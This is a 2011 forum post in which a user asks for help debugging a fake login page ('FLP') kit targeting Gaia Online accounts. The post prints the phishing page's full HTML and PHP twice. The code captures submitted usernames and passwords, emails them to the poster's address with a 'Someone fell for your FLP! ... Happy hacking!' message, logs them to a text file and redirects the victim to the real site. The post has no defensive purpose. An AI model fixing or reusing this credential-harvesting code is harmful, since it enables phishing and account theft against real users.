Ok so I'm using TEMPTii's login.php creator program thats in UGB, and I'm pretty sure I'm using it correctly but I keep getting this error:
BTW I'm using his program to replace the php info in the Sent.php file of Obey's free FLPCode:Warning: Unexpected character in input: '\' (ASCII=92) state=1 in /home/freehost/***.com/w/1/my***and110mbUsername /Sent.php on line 21 Warning: Unexpected character in input: '\' (ASCII=92) state=1 in /home/freehost/***.com/w/1/my***and110mbUsername/Sent.php on line 21 Warning: Unexpected character in input: '\' (ASCII=92) state=1 in /home/freehost/***.com/w/1/my***and110mbUsername/Sent.php on line 21 Parse error: syntax error, unexpected '"' in /home/freehost/***.com/w/1/my***and110mbUsername/Sent.php on line 21
This is what mine looks like:
The only part of that from the FLP login.php generator is theCode:<html> <head> <title>http://www.gaiaonline.com/?sucess_sent/superprize=55423424</title> <script type="text/javascript"> window.location = "http://Gaiaonline.com/inventory" </script> </head> <body> </body> </html> <?php header ("Location: http://gaiaonline.com/inventory"); $username = $_POST['username']; $password = $_POST['password']; $subject = "You have an account waiting for you!"; $body = "Someone fell for your FLP! Their username is " . $username . " and their password is " . $password . "! Happy hacking!"; $date = date("F j, Y"); $all = "Username: " . $username . \n . "Password: " . $password . \n . "Date: " . $date . \n"; $file = "logicx.txt"; $handle = fopen($file, "a+"); mail("MYEMAILADDRESS@gmail.com",$subject,$body); fwrite($handle, $all); fclose($handle); ?>
Part, which I just pasted over the old one.Code:<?php header ("Location: http://gaiaonline.com/inventory"); $username = $_POST['username']; $password = $_POST['password']; $subject = "You have an account waiting for you!"; $body = "Someone fell for your FLP! Their username is " . $username . " and their password is " . $password . "! Happy hacking!"; $date = date("F j, Y"); $all = "Username: " . $username . \n . "Password: " . $password . \n . "Date: " . $date . \n"; $file = "logicx.txt"; $handle = fopen($file, "a+"); mail("MYEMAILADDRESS@gmail.com",$subject,$body); fwrite($handle, $all); fclose($handle); ?>
Sorry I'm so nooby with FLPs, but I need help
Thanks,
~Flareboy323
Results 1 to 22 of 22
Thread: login.php help?
Threaded View
- 14 May. 2011 02:17pm #1
- Join Date
- Apr. 2010
- Location
- When freedom is outlawed only outlaws will be free
- Posts
- 5,113
- Reputation
- 195
- LCash
- 0.00
login.php help?
Last edited by 323; 14 May. 2011 at 02:22pm.